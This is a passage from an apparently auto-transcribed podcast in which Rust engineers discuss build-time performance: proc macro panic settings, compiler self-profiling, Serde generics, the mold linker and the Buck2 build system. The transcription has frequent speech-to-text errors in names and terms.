Exactly. It's not

Speaker 1: 41:48

not really the experience that anyone really wants, especially when you're trying to debug your proc macro. You shouldn't be the and it's, you know, on the one hand, it's like, god, I I wish it were different, but I can see why it's it's the way it is and, it's, it's tough. How and ring, can I ask, like, do is that just something you kind of knew or how did you how are we able to make the leap from like wait a minute I know that there's a different unwinds that a different panic setting for, for proc macros? So, this is not something

Speaker 5: 42:25

I knew before doing this investigation. So I started doing this investigation and I'm like, okay, it looked like there were like 7 copies of Sergi JSON being built. And I'm like, why are there 7 copies of Sergi JSON being built? So I started looking at all the individual copies and seeing, seeing what they said. And so in some cases, it's said that those, those copies are built with unwind and in other cases, Seltos, those were copies were built with a board.

Speaker 5: 42:54

So I started scratching my head and I'm like and and I looked at our, our, workspace cargo or toml or specify these settings, and it just said panic equals unwind for dev builds sorry. Panic equals abort for dev builds. So I started looking at it, and I'm like, okay. This is something weird that cargo is doing. And then I literally went to github.com/rustlang/cargo.

Speaker 5: 43:18

And in the search box up top, I typed in unwind. And I, you know, people like people like hate on GitHub code search these days. I mean, it's Yeah. I, I thought, like, it the first result I provided was exactly relevant. Like, it was it showed me that, okay, there is actually a line in, in cargo, which forces panic, equals unwind for procmavers and build scripts for this exact reason, that, you know, this is a plug in.

Speaker 5: 43:49

So it needs to be, a BART doesn't really work.

Speaker 1: 43:54

Yeah. And so were you I guess, were you surprised by that? I mean, you probably had the same reaction we did. It's like, well, I guess I understand it in hindsight, but it's it's, I'm disappointed to learn

Speaker 5: 44:04

this. Yeah. I was, I was definitely, I mean, yeah, the moment I saw the reasoning for it, I'm like, yeah, of course. Right. But, but, you know, it was definitely surprising coming into it.

Speaker 5: 44:15

Yeah.

Speaker 1: 44:16

Yeah. And then so and then on that, like, we for that, we have to I mean, there's not an easy resolution on that. Right? We have to basically just change our disposition in our debug builds in order to be able to get our dev builds in order to Yeah. We we need to kind of let the Wookie win on this one.

Speaker 1: 44:33

We can't actually fight with the how they wanna compile proc macros.

Speaker 5: 44:36

Yeah. Yeah. So we still ship release bills with panic equals a board set, but, debug builds do set unwind now. You know, that's the that's the trade off. Right?

Speaker 5: 44:46

You know, I I you know, I'm fine with it, but, you know, one of the reasons we like Pankaj support is that it there are cases where invariance can end up breaking with bank equals unwind. And I have a long rant about how standard mutexes are the correct mutex, because of this, which I can go into later. But, but, you know, the the fact is that we have a divergence between dev and prod now, and, you know, we gotta live with that.

Speaker 1: 45:14

Yeah. And a I mean, it's all intention with and and what was the, what was the win, in terms of, like, not rebuilding all this stuff? Because I think this is you know, the best way to get a win in a in a system is to avoid doing work completely as opposed to speeding up work, and this avoids a lot of work. Right?

Speaker 5: 45:33

Yeah. So, the work that I ended up doing to figure this out, like, and kind of put this to bed once and for all, It's it's it's hard to give a single number because a lot of it depends on the exact behaviors, but, there there were, like, a bunch of cases where, so Omicron full request 4535, which includes this and a whole bunch of other changes that made this work. And, you know, like some things that were taking 20 plus second to rebuild now just took one second. Overall, for a common scenario, with, like, 4 specific runs, I, this ended up being a 1.26x speed up, which was, pretty sweet. So, you know, there's there's, like you know, again, like, it depends on a lot of it.

Speaker 5: 46:23

And as, Sean alluded to, like, so much of it is, like, this none of this helps with, like, an individual crate taking a very long time. Right? Like, this helps when in, like, other scenarios. So, you know, we are still dominated by those long poles, but at least we can improve some of these incremental steps a bit.

Speaker 1: 46:42

Yeah. Interesting. And so, you know, we talking about proc macros and build scripts, I mean, if people aren't, familiar most people have at least heard of proc macros, and then build scripts are, kind of the hard drugs that that proc macros lead you to. I found where you could, like actually, let's and I I I have found that, you can bloat your compile times very significantly when you get a little bit of a build script problem, which I may have had at from time to time. Know, I'm trying to kick it.

Speaker 1: 47:11

I'm trying to be clean, but, you know, every day is a struggle. The

Speaker 5: 47:15

I love build scripts. I mean, they're good.

Speaker 1: 47:17

Build scripts so much. I wanna party right now. I I gotta tell you, like, let's go go let's go in the build trip right now. I I, you know, I don't care that I just got out of rehab. I'm ready to roll.

Speaker 1: 47:27

I love build scripts, and I kinda feel like the like, the discovery of build and you know what? Because Cliff showed me build scripts, and he was regretting it as he was doing it and then immediately regretted it completely. He's like, why am I doing that? This is not you're not gonna handle this information responsibly, and I definitely have not. I feel sorry.

Speaker 3: 47:46

No. It's good. They're just another but they're just another place where, like, the handling of inputs and outputs and making sure that you're caching the stuff correctly. Is just like it's another area where there's a very particular way to make sure that you can do this right. I encountered that like this yesterday actually where, if you have a build script where the dependencies of the build script change, but your build script, let's suppose that it's emitting some artifacts like some output, because that output is exactly the same.

Speaker 3: 48:12

Even though the dependencies to your build script have changed, everything downstream from that will require recompilation even though the build script is submitting the exact same artifact. It's avoidable. You can get around this, but like it requires some careful setup to do, and it's definitely not like by default you recompile the world.

Speaker 1: 48:32

Yeah. That's interesting. And and it will be it's kind of a surprising result. And so, Sean, I know you've also spent some time just on the performance of proc macros. What were some of the things that that you found in terms of of what affected build times there?

Speaker 1: 48:44

And and and, actually, how did you find that stuff? Because, again, it's it it I think that's half the trick here or more is, like, the tooling to actually understand where we're actually spending time.

Speaker 3: 48:55

So, for proc macros in particular, this is kind of one of the areas where, understanding within a single crate's timing, where time is going, building a crop macro crate, that's something where you could see building that crate itself. You can usually get that information from something like the cargo build dash dash timings flag. But if you're using crop macros, like let's say that you have a bunch of calls to Serity, you're using Serity derive in a bunch of your code. You're using Serity JSON, you're using a bunch of derives. That's a pretty common thing to do.

Speaker 3: 49:28

How much does that cost you? That sort of information that would come in the form of, that single crate build time. So this is kind of a good segue from what we were discussing earlier, where we were talking about like generics and the cost, the binary size of how much that generic costs. But that's, as I mentioned earlier, like that's a proxy for the real signal, which is like, why is it taking so long to build? Right.

Speaker 3: 49:58

And if you actually wanna get information about why is a single crate taking long to build, Cargo actually does provide a self profiling flag that's pretty decent here. I really want to see more tooling built around this. I personally want to build more tooling around how to interpret this because the feedback is really powerful. But it requires some analysis to make use of it. So the the cargo bill, the the I believe it's a rusty flag that's self profiling.

Speaker 3: 50:27

You can ask for arguments to this thing and you can basically get out a, a JSON file that has descriptions, in a timeline of like where every single step along the way, the compiler was working on things. And if you do this with like the default arguments it basically gives you the names a bunch of internal compiler passes which is not that useful. Because like seeing, oh, code gen and LOBM passes took up 90% of the time of building this crate. It's not that informative. Like it's a little informative but it's not as informative of as like which module were you working on?

Speaker 3: 51:03

Like what functions were you actually doing work on to produce the thing that you produced? You have to kind of massage this thing to get specific output but you can get that insight there about like, hey, this is actually what is going on inside the build. Part of the reason that I want more better tooling around this is that this, the output of this thing is a JSON file and there are ways, there are some tools built around it like summarize is 1 And I can give a link in the chat as well to kind of where the family of tooling is around this. But, if you have a large crate that's filled with a bunch of stuff that's taking a while to build and you're trying to figure out, like, where are the slowest spots, you you basically are then you need to go take that JSON file and do an analysis on it and figure out, like, what is optimizable and kind of run your own summations on different submodules and figure out, like, what are the common patterns. But that the next steps there, it's pretty much you're on your own with that JSON file.

Speaker 1: 51:58

Right. Right. You're definitely off road at that point, but I mean, it must be, I mean, wild in terms of the amount of information you're getting out of the compiler about with with what's going where. What did you discover about that? I mean, what in terms of when when you have you been able to go into that and and make progress on on where time is being spent?

Speaker 3: 52:17

Well, the first thing I discovered on it was that if, you ask for the cargo self profiling to run on a crate like our control on something like our control plane, and you do it without asking for any arguments, it gives you output that's like in the tens to 100 of megabytes. But if you ask it to actually profile the arguments and tell me, okay, actually identify when you're working on compiling every type, every every function, like write down the function you're working on and when, then it goes up into the gigabytes range of size and there was a u 32 overflow that we bumped into.

Speaker 1: 52:53

So which I just I find

Speaker 3: 52:55

this like so poetic, right? Of like, of course, like you're you're it's a crate that's emitting a bunch of output. You're doing a bunch of stuff. Isn't that the type of thing that you'd want to be optimizing? Like, I get that if you can have, like, a simple reproducible case you can put into, like, a hell like a hello dot RS file and just do that.

Speaker 3: 53:13

That like, that would be useful if you're trying to like write a repro case for the compiler. But if you're actually trying to analyze a real crate that's very large, like haven't other people bumped into this? But anyway, so that's that's fixed on nightly right now and that will be rolling into the next stable release. So everyone else can look forward to that and not bump into the same problem. But yeah, that's part of why I think more tooling needs to be built here is because like, it is kind of difficult to analyze that file right now.

Speaker 3: 53:38

Like I think it contains all the information that one would need, but like you get a very, very narrow slice of what you're actually working on on the system. And I think the tools to kind of give you aggregates based on modules and give you aggregates based on functions, especially for the case of like you're deriving something. So the symbols are a lot more specific to what are where you happen to use that derive. Like if I tried to give you an answer for like what is the cost of using Serity derive and of deriving serialized and deserialized across all the structs in in our crate. I'd love to give an answer for like roughly this is how much of the total time was spent doing that, but that it's not really easy to do right out of the box.

Speaker 1: 54:20

You've got the right tooling that that is able to to interpret it.

Speaker 3: 54:24

Yeah. Yeah. Which I think is gonna be that's an area where I'm interested in making investments over the next few months. And I I I think that's something where if anyone else is interested that's listening to this, it has similar Rust projects where they wanna get better insight there. I that's a I would point you all toward that direction because I think there's a lot of low hanging fruit here.

Speaker 3: 54:41

Because this tool is really, really powerful for getting that good analysis on a a large crate, but it it's it it needs more support.

Speaker 1: 54:50

Well, and I think it's fair to say that more and more people are going to run into these kinds of issues. And there's gonna be more and more demand for this kind of tooling as, because I think that, you know, for I I mean, obviously, there are organizations that have had rust in in production longer than we have here at oxide, but for a lot of things, we're we're kind of like relatively close to the I mean, just as your your ether v two overflow indicates. So it's like it's a it's a good indicator that that you're towards the the leading edge of something. It's like, okay. I am, but I think a lot more are are coming as we as we, you know, there's so many advantages for software in the large for this.

Speaker 1: 55:28

It's it's feels like a, something that a lot of other people are gonna are gonna wanna hit are going to hit and are gonna wanna get resolved.

Speaker 2: 55:36

Hey, Sean. As you were describing some of the things you're hitting with Serdi, it really sort of took the bloom off the rose a little bit for me. Like, I view Serdi as this unassailable marvel. But then as you started to explain some of the the extreme use of generics and and, you know, what the code actually turns into, it did sort of make it me look at it in a different light. And and so I'd love to hear more about, like, your analysis, Serti, and then also some of the other crates you kicked over as potential alternatives.

Speaker 3: 56:06

Yeah. So I I definitely looked into a few of them. I don't don't really think we've pulled the trigger on any of them yet, but it sort of has opened my eyes to, oh, I get it now why a lot of these alternatives exist. Like I didn't really understand why like Serity seems like great. If you can use it, it's so flexible.

Speaker 3: 56:21

Like why would you need something like Mini Cerdise? It seems like it's just less useful. Right? Or like maybe maybe you have some environment where like you really, really care about a really limited set of things, but like, why would I care about something like that if Saturday is working for me? You sort of have to, kind of accept that there is like the a trade off that you're making there for generality versus having code that is not generic that fits a specific use case that doesn't cause increased code generation, and that can act over more generic objects, like, it's just gonna take less time to compile.

Speaker 2: 56:54

Yeah. It's like yeah. Sure. All of our API objects could be serialized into CBOR or something, but we don't. Like, we always serialize into JSON.

Speaker 2: 57:04

So there's a bunch of junior system that we frankly don't need.

Speaker 4: 57:09

So I also wanna, like I think part of maybe what you're experiencing, Adam, too is this, like, the back and forth between these things. Like, think back to your old c using self and be, like, add a couple lines of code, and you get a fully fledged super fast parser for your custom struct with no work.

Speaker 1: 57:27

Totally magic.

Speaker 4: 57:28

Now but now that's, like, normal, and so we're starting to deal with some of the downsides of how those things are implemented, but, like, those are only because everything was so wonderful. Like, I like, but but at Rust 1 point o, proc macros weren't in the language. Like, one of the largest uses of nightly was people using compiler plug ins, which is the predecessor to proc macros because these use cases were good enough. But, like, also because they were built around compiler internals, they broke constantly. And it was a huge pain in the butt, but they were, like, so valuable that people suffered all these different kinds of pain to end up actually using them.

Speaker 4: 58:04

And then, like like, Rust 115 was, like, a really, really big important release, because it was, like, the thing that stabilized Derive, if I remember that correctly. It's been many years by now, but, like, that was a huge day. And, like, right after that, like, nightly usage dropped significantly because people could actually move on to stable for these kinds of use cases. And so I think there's, like, a natural back and forth, right, where you, like, you get new functionality, and then it becomes the new normal. And then you're like, why do I gotta pay all these downsides for this thing?

Speaker 4: 58:31

But it's also worth remembering that, like, before this world, we also had downsides. And in many ways, they were, you know, worse.

Speaker 1: 58:39

Oh, Steve, are you telling us that we're we're ready for the truth that there are 0 cost abstractions? That that was a lie that I had to tell you in order to add it.

Speaker 4: 58:49

So it's funny because even and the, like, c plus plus people have been trying to use 0 overhead abstractions late like, more more recently. And by more recently, I mean, I think, like, the last 10 years or so. But the the the the meme was so strong that, like, nobody, changes that, because everything has a cost. It's true. So it's, like, it's about where that cost is allocated.

Speaker 1: 59:12

I I and I think that, like, on balance, I also feel that the for so many of these things, it's that the the pain points are going to only happen at scale. And I think that Rust is so much better on so many of these things than than other languages and environments. So I think it is it is almost it's almost, I don't know, reassuring, Adam, in a strange way that that you're disappointed by you're just you're just learning the truth. You're

Speaker 2: 59:38

Your parents are here. I think Your parents are foul. I think it's just I think it's just that I found so much unequivocal beauty inserted. I mean, as you're saying, Steve, and then define that there was a perhaps hidden cost. I don't know.

Speaker 2: 59:50

Just surprising. Not not that it takes any of the beauty away, but just makes you think in some circumstances, it's not gonna be the right tool. And there are reasons for there there are trade offs for the application. There are places where it I'd want maybe a certain or I'd want, you know, some other kind of library.

Speaker 1: 01:00:06

Yeah. What and Sean, it's kinda what you were saying too about it kind of, like, the giving you a perspective on, you know, generics versus traits and, like, these things become, like, alright. I these are different tools in the toolboxes at different times, and, I I may want one or the other for different reasons.

Speaker 3: 01:00:22

Yeah. And I I think I'm I'm coming here being a little bit critical of things like, well, what about all those cases where you're deriving things? What about cases where you're generating code? What about cases where you're generic? Like and part of the reason that I'm critical here is because I have that mindset on of, like, I'm analyzing code.

Speaker 3: 01:00:36

I'm trying to find things that are potentially offenders that cause the compiler to spend a lot of time churning here. But like, I I do wanna back up a second say, I I love Serity. It's a great tool. Right? Like, it's very, very useful.

Speaker 3: 01:00:47

And like, I've reached for it and I will continue reaching for it in the future as well. It's just yeah. Totally understanding that these things have costs.

Speaker 1: 01:00:55

When how can we did we just reduce these costs as much as we can? I mean, not you know? Sorry, Rade. I think you're trying to get in there.

Speaker 5: 01:01:02

Oh. Oh, I was just I was just gonna say that, you know, I I I really love Serdee. My my biggest concern just tends to be that, you know, we have kind of Serdee as the ecosystem has committed to this whole, like, it's like a it's like a commitment that has been made. It's like the whole, like, pretty much every Rust crate supports Sergi in some fashion or the other. And so we'd have, you know, all of this baked in.

Speaker 5: 01:01:27

So we have gone down this modernization path. If we wanna switch to something like MiniSerti, which actually uses DIN, like, trade objects using DIN and stuff, then all of a sudden we have to, like, you know, kind of redo all of this work across the ecosystem. And the commitment is, like, that's the thing that, you know, kind of just chew on me a bit.

Speaker 1: 01:01:50

Yeah. Interesting. Yeah. And then, Sean, you also discovered that, length times. So we we generate large static executables here with Rust, and that puts new pressure on the linker.

Speaker 1: 01:02:04

Do you wanna talk about some of the stuff you found there?

Speaker 3: 01:02:08

Yeah. So this was an interesting case where we've actually bumped into issues that are actually kind of more platform specific. So we've been talking a lot about, like, build speed. Right? We're talking about different build configurations, which kind of is all lumped into the category of, like, you walk up to a machine and you run cargo build.

Speaker 3: 01:02:27

But that's only been part of the picture for us internally at oxide. And, like, the thing that we really are trying to track at the end of the day is like, what is that developer velocity experience, which is more than just building, right? It's how long does it take to build your code? How long does it take to package it up and put it onto a target machine and deploy that machine and get a a control plane up and running and get the whole system running and boot VMs and then get things onto GitHub and get your PRs merged and move on with your life, right? And the whole process here, and there's a lot of different faces to this.

Speaker 3: 01:02:57

So this is one of those areas where, we definitely noticed a distinction between folks that were developing on some platforms versus others. And this is one of those cases, where admittedly I think a lot of the credit goes to a handful of other folks that did more of this investigation. I know Rye did a lot of this. I know, Dan Cross, who I think is here today in the audience also did quite a bit of time analysis here as well. But this is one of those cases where we, for a certain number of crates that are operating on a very, very large number of files.

Speaker 3: 01:03:33

I mean, we have our control plane. It is it is split into multiple crates, but at

Speaker 5: 01:03:38

the end of the

Speaker 3: 01:03:38

day, there is one binary that is being built that's linking together all of these different artifacts and crates. On certain operating systems, we would notice the the build time would tank at the end. It would be a bottleneck of, like, many minutes to actually finish building this binary. And that is sort of the thing where if you're doing you definitely would hit this on any single character change, right? You'd have to go through this process many minutes to rebuild this binary.

Speaker 3: 01:04:03

And that that was very painful for developers going through that experience. So, yeah, I can

Speaker 1: 01:04:08

I can jump into more detail on on sort of what we found out within that linker if you want? But Yeah. Which in terms of, like so in in kind of what our experiences have been with with Mould and mold being an alternative linker, if you if you're

Speaker 3: 01:04:22

so So to Cargo's and Rusty's credit, it's actually fairly straightforward to swap what linker you want to use. Like, this was something where we had like the theory of maybe the link time is slow and this is an area that we can improve and we could get like pretty good times to compare LD versus LLD versus mold on different operating systems. Like there's a small asterisk in there of uncertain systems that actually took a little bit of extra work to get mold to actually build. But it wasn't too bad, like a couple of patches and we could get there. And in particular on that case, if you're having if you're building a lot of crates, each individual one, it doesn't make much of a difference.

Speaker 3: 01:05:04

But if you're talking about that situation where you are assembling a binary that itself is composed of many crates that has pulling all of these large pieces together. That's you're running one large service that is the amalgamation of many other pieces. We saw a huge, huge difference there. LLD versus LD we saw a significant jump and mold was basically the best option across all systems that we saw. Like the time there was quite drastic.

Speaker 3: 01:05:29

It's many minutes worth of difference for for the objects that we're building.

Speaker 1: 01:05:33

And and Rainey, you've been a long time mold user. Mold is new to me. I I don't know how how a mold fluent you are. Yeah. I'm I'm a I'm a mold novice as well.

Speaker 1: 01:05:43

But, Rainy, you you mentioned you you integrated into your into your dev flow a long time ago.

Speaker 5: 01:05:49

Yeah. I, think I saw a link on, like, Hacker News or something, and I was excited to try it out. Mold is like, I I just, like, I love how easy mold is to integrate into Rust. Like, it's it's so smooth. There's 2 separate ways to do it.

Speaker 5: 01:06:04

Each one of them has upsides and downsides. And so I started using it for my personal bills and stuff, like, I don't know, 3 or 4 years ago. You know, it's always it's never had a bug. Well, actually, no. There was one case where it started crashing, but then I had to then I think the author released a hotfix.

Speaker 5: 01:06:23

But in general, it's been like a super smooth process, and, you know, I've been getting everyone who's, you know, who's willing to listen. I've been getting trying to get them on the mold.

Speaker 1: 01:06:33

Well, I think we got some pretty good I mean, the the numbers are really pretty astonishingly good. I mean, it makes definitely use of multiple cores. And,

Speaker 4: 01:06:41

Dan said in the chat that mold is 400 times faster than a Lumos LTE for building Omicron.

Speaker 1: 01:06:47

Yes. It's it is quite a bit faster on

Speaker 5: 01:06:50

Yeah. So On on Linux, I remember, like, I was building a, again, like, a single large service similar to Omicron. It was, like, 20 to 25 x faster on a on a 12 core, CPU.

Speaker 1: 01:07:04

Yeah. And it will be faster on the, you know, the more cores you got, the the more upside you have there because, I mean, I mean, historically, the system linker has been single threaded because it's not something that, you know, for a bunch of reasons, I think there was a lot of movement away from static linking towards dynamic linking, and a lot of time and energy spent on making dynamic linking, making that perform really well. And that's when disk space was at a premium, and, you know, there were a bunch of other reasons why we we kind of were thrust towards memory was more at a premium. And, you know, I I don't know when that started kicking back exactly, but, whether that was, where you get these much larger maybe those with Go, we have much larger statically linked binaries. And I think also people were just kinda sick of the the dependency held that you had with shared objects, certainly ones that weren't weren't versioned well, and there were a bunch of of challenges with shared objects.

Speaker 1: 01:08:02

And kind of the pendulum swung back, and it's like, actually, static linking is really, really important.

Speaker 5: 01:08:07

I think

Speaker 1: 01:08:08

And, you know, the you know, Stan's saying in the chat, it's like, you got these kind of, you know, a full featured system linker. It does really great stuff, but it's, actually, for this problem at hand it's like actually we want to just like link really really fast and we actually need to do that by by using multiple course.

Speaker 5: 01:08:28

Yeah, I, I agree. And I think with Russ, like monomorphization basically forces you for the most part into static linking because

Speaker 1: 01:08:38

Interesting. Yeah.

Speaker 5: 01:08:39

You essentially are copying our own object code. Right? You don't have a single copy. You have lots of copies of a different function and so on. So so this kind of ties back into the monoritization thing.

Speaker 5: 01:08:48

Right? I think those things are pretty closely related.

Speaker 4: 01:08:52

And also, it has very interesting applications for, the GPL. If you, start processing through this is like a very deep, deep hole with lots of implications that have been built over a very long time that are starting to, like, unravel in ways now.

Speaker 1: 01:09:07

In in terms of the linking exception with the the the GPL or I mean, what

Speaker 4: 01:09:13

Rain was just talking about, like, you know, if you're using a generic in Rust, the library has the, like, sort of templates to use a very overloaded word in this context, like, saved. And then when you, you know, link it against your code, you're, like, then writing code. You know, like, linkers are compilers. Like, the whole separation of these two things is, like, completely history at this point and not due to their, like, actual abilities, you know, Like, link time optimization. Like, linkers are optimizing compilers in a certain sense.

Speaker 4: 01:09:41

But, like, yeah. Like, it's it's very clear, at least to me, and I'm sure there's somebody who maybe in the chat will know of a big giant thing that's written about this. But, like, when you're basically, like, running code at link time and inserting that into a different binary, like, if I use a Rust crate that's GPL'd, is that gonna make my project GPL'd? You know? It's like, there's there's a lot of it's sort of all built around the c compilation model, and things that don't do that gets a little weird.

Speaker 1: 01:10:07

Well, I think it's in part because of that ambiguity that in, I mean, crate because oh, the like, in the crate ecosystem, it is MIT and Apache. Right? And and you don't see a lot of GPL. You see LGPL, but you don't I think that's the kids. For that reason.

Speaker 4: 01:10:23

I and I include I include the kids as being millennials in this point. I think there's been a industry wide rejection of the GPL, and the rest is just, like, part of that, unfortunately, sort of? Maybe? Question mark? I don't know.

Speaker 4: 01:10:37

I have really complicated feelings about this topic. It's a whole different episode.

Speaker 1: 01:10:42

Yeah. Yeah. I would say I would say not, unfortunately. So we can have that we'll have to have that debate. We can the the Lincoln Douglas debate, g b l v MIT.

Speaker 5: 01:10:52

And,

Speaker 1: 01:10:52

Brian, did you

Speaker 2: 01:10:53

did you see there, you know, with regard to proc macros, did you see David Tolnej's proposal to compile proc macros into WASM and then just to execute the WASM to generate code? Have you have you been plugged into this at all?

Speaker 1: 01:11:07

No. Where do where do I yeah. What do

Speaker 2: 01:11:10

Yeah. I'll put in the show notes. I'm I'm gonna give the the simpletons version of the history here, and then I'll let Steve and Sean and Raine clean it up. But I think the simple version is I I I think David has wanted something like this for a very long time, and got so frustrated in about, June or July, August sometime during the summer last year that he sort of surreptitiously built a mechanism or not surreptitiously. That sounds it makes it sound nefarious, but he he built a mechanism into, SerDes derive that included some pre compiled binaries.

Speaker 2: 01:11:42

And then after a few releases or or maybe immediately, opinions differ, some folks sniff this out and weren't that into it. The fact that there were some binary blobs that were executing in these environments. So there was a big kerfuffle. I think, this kind of change that had been around for a little while was reverted. But then David wrote a great kind of proto RFC, which, again, I'll link in the notes.

Speaker 2: 01:12:06

But Steve Klapick, how do I how do I do? Is that, within kind of 50% of accurate?

Speaker 4: 01:12:11

Yeah. I think I think you did a very good job. I think it's There

Speaker 5: 01:12:13

you go.

Speaker 4: 01:12:14

Difficult because a lot of this depends on opinions about what happened. And so I think you did a good job of neutrally describing it when it's very easy to non neutrally describe it.

Speaker 1: 01:12:26

Maybe maybe too neutral. What is it that matter?

Speaker 2: 01:12:29

Yeah. But but the the short of it is, you know, you know, there'd be a bunch of changes to cargo and to crates dot io and so on and so forth. But the result would be you're you're not compiling the proc macro, and as Rain was alluded to, you're not recompiling it, recompiling it, depending on a sundry of different flags, whatever. You're just executing this WASM. And and you'd also just opt into it.

Speaker 2: 01:12:53

Like, if you wanna recompile it, go for it. If you wanna use this WASM binary blob. And then a bunch of other benefits. You know, talk about build dotrs. It's kind of crazy, Brian, that if you think about, like, a if you include a random creates dot I o dependency, that it could run, you know, a build dot r s or proc macro code that could do literally anything on your system.

Speaker 3: 01:13:16

Yes. Right? It could, like Yes.

Speaker 1: 01:13:18

You know, it has a

Speaker 2: 01:13:19

bunch of secret files and open a network socket and vomit them to it. Pretty pretty astounding. So, you know, part of the benefit here would be able to run this stuff in a sandbox environment.

Speaker 1: 01:13:33

Yeah. Interesting. I can I mean, I could definitely see the appeal? I mean, I my concern with this kind of stuff is always, like, kind of, if it gets stale or goes wrong or, you know, how do you totally but, you know, I I also I I I'm so impressed generally with the robustness of the tooling in the Rust ecosystem. I mean, there's just there, just isn't a lot of that.

Speaker 1: 01:13:57

I I guess Sean's, issues aside, the u 32 overflows aside, but generally, the tooling is awfully robust, and we we don't have issues with, like, you know, because you always get worried about, like, this object was not rebuilt when it should have been to me it's always much more frightening than we unnecessarily recompile this object when we didn't have to. But maybe that's just, you know, maybe that's just my disposition towards, correctness. If I have to choose between correctness and performance, I I I saw crackers, but I well, I don't think it'd put a lot of problems with that with with rust not recompiling things being too aggressive with respect to optimizations So, so, Sean, what's the kind of the the the future here? You mentioned, getting excited about some of the tooling, some of the profiling, and, know, how you can, you know, making use of that, the to right now that you've got these kind of bugs fixed, in the compiler, being able to build tooling on top of that. I mean, we do what's the kind of the the future for the, the the workflow and dev flow for for Rust?

Speaker 3: 01:15:04

I don't know if this is accurate. I'm gonna describe how it feels. It feels like a lot of the tooling that exists around single crate profiling with Rust is built for people who are contributing to Rust C and who want to understand how to make the compiler faster, which I think that's a great disposition and it's good that those folks have useful tools. I want the future of this tooling to be, here is your crate that you built, and this is where we spent time building this to be in an easily digestible format that you can, as a author of a crate, understand where each different piece in each module, you can understand where derives are taking place, you can understand the overhead of generics and that's easy to do kind of navigating through your crate at a module by module level. I think that'd be very, very powerful to have.

Speaker 1: 01:15:51

Right. You wanna be able to answer the question what's taken so long and Exactly. Be able to and I think also, like, you know, to date, done a pretty good job of allowing people you to opt into asking that question because I think there are gonna be a lot of Rust developers for I mean, as as we talked about at the at the top, compile time doesn't matter until it does. And, you know, when you're first coming into Rust, you may be like, I'm not sure. I see what all the hubbub is about.

Speaker 1: 01:16:15

Like, the sync compiles pretty quickly. And, you know, the next thing you know, it no no longer compiles as quickly because you've, you've really gone to town on it, and you wanna be able to to allow people to easily answer that question and, be able to and, you know, Steven, I know you've been playing around with Buck too. I mean, do you view that as a how important is that to the performance of build times? Where are you on that?

Speaker 4: 01:16:40

So it's I I know this is purely because we have talked about it a lot of times, but, Rain is far more qualified to talk about this topic than I am. I am but a simple baby starting to play, with this thing, and I'm excited about it. But, yeah, I I would actually redirect that questions ever so slightly.

Speaker 1: 01:17:04

Shane.

Speaker 2: 01:17:04

Okay. Fuck you.

Speaker 5: 01:17:06

Yeah. Alright. So, I think, putting putting things like Buck 2 in context, I think, you know, what, Adam mentioned about, like, you know, shipping WASM for a proc or whatever. Like, I think that that is a special case of a kind of generic approach to caching and specifically distributed caching. Right?

Speaker 5: 01:17:28

So let's say that, yeah, we are in a world with fully reproducible builds. Right? So you know all your inputs, and you know that the output for a particular input for a particular step in the, unit graph is exactly the same. Right? So I think that a lot of the wins, like, kind of a lot of the wins at scale end up being thanks to distributed caching, where you have these caches that are kept warm by, say, CI machines and stuff, and then local developers can just pull those artifacts down, and the build system does that automatically.

Speaker 5: 01:18:03

So buck 2 is kind of a, what I'd like to think of as a totalizing version of that, where what it does is that every, like, so Buck 2 is a build system. It's a polyglot build system built out by Meta. It is the successor to Buck 1. Buck 1 was written in Java. Buck 2 is written in Rust.

Speaker 5: 01:18:26

Buck is most closely similar to Bazel, if, folks have heard of it. Buck, the way Buck and and Bazel and Steph work is that they actually require what they call hermetic builds. So all your inputs must be specified in build files. So you can't depend on anything in the environment. You can't depend on a system compiler.

Speaker 5: 01:18:47

You can't depend on any of those things. And, and in return, you get the ability to do distributed caching, which is absolutely crucial when you're building services that are at Google or meta scale. I think BUCK. 2 is great for what it is. And I think that, you know, in many ways, I can see a future where we do switch to it.

Speaker 5: 01:19:13

I think there are some hurdles that we need to actually look at. So I think one of them is is that, as I mentioned earlier, bp2 is totalizing, which means that everything, all your dependencies, everything must be expressed in Buck's language so that Buck understands what's going on. That is the only way Buck can work at all. And there is a lot of good tooling built for this. My, former coworker, Jeremy Fitz Harding, built out a tool called Reindeer, which converts cargo, cargo.

Speaker 5: 01:19:48

Toml files into bug nodes. It's pretty great. So so for the most part, that works. You have to, like, manually batch things up here and there, but it generally works. I think the other thing that you have to look out for is that, we have a lot of tooling that is assumes cargo, mostly out of path dependence.

Speaker 5: 01:20:13

So, you know, there's no particular reason it needs to be tied to cargo, but we would have to port all of that tooling to using Buck. And an example of that is, so in in Omicron, we use a test runner called Cargo Next Test. It's a test runner that, I'm the primary author of. At the moment, it depends, and it's tied pretty intimately to cargo. That isn't inherently the case.

Speaker 5: 01:20:40

You know, we could spend, like, 3 2, 3 months making it work against Buck 2. It would be fine. But, you know, that's a that's a, you know, that's an investment that we would need to make. Yeah.

Speaker 1: 01:20:52

I do love you calling Buck Buck 1. It's kinda like the World War 1, World War 2 distinction. I mean, did they call that the great Buck before there was buck 2? It was the the, and then but and that's really interesting about the kind of the automated tool, because I do find that, like, the d I I completely understand why these things have their own DSLs, but then the DSL, really makes it, that that just steepens the ramp to get to get on to these things.

Speaker 4: 01:21:23

I was gonna make a joke earlier, actually, much earlier in the episode about how with your love of build scripts, I'm surprised I have not introduced you to Starlark yet. Actually, because in some ways so Starlark is the is the the DSL as you said, but it's it's actually like a subset of Python that, both Buck and Basil used to,

Speaker 1: 01:21:44

I got you.

Speaker 5: 01:21:45

Script part

Speaker 1: 01:21:45

of the build scripts. So I gotta tell you the thing that I love with the build scripts is that it's in rust. That's what is, like, I just love. I actually don't love Python. Sorry, Python.

Speaker 4: 01:21:57

I don't love Python. I don't love Python either. There is a small discussion on the book issue tracker about writing a book scripts in Rust, but I don't think that's I think that's going to happen realistically anytime soon.

Speaker 1: 01:22:08

So I I will tell you that, like and, I came you know, there have been a handful of times my career when I thought I was actually gonna start crying, and one of them was at the hands of scons, s cons, what do we say, which I feel is like one of the predecessors to these systems. Maybe that's a that's an inaccurate read of the

Speaker 2: 01:22:26

It is

Speaker 1: 01:22:27

lineage of build systems. What's that?

Speaker 4: 01:22:29

It is not an inaccurate read.

Speaker 1: 01:22:31

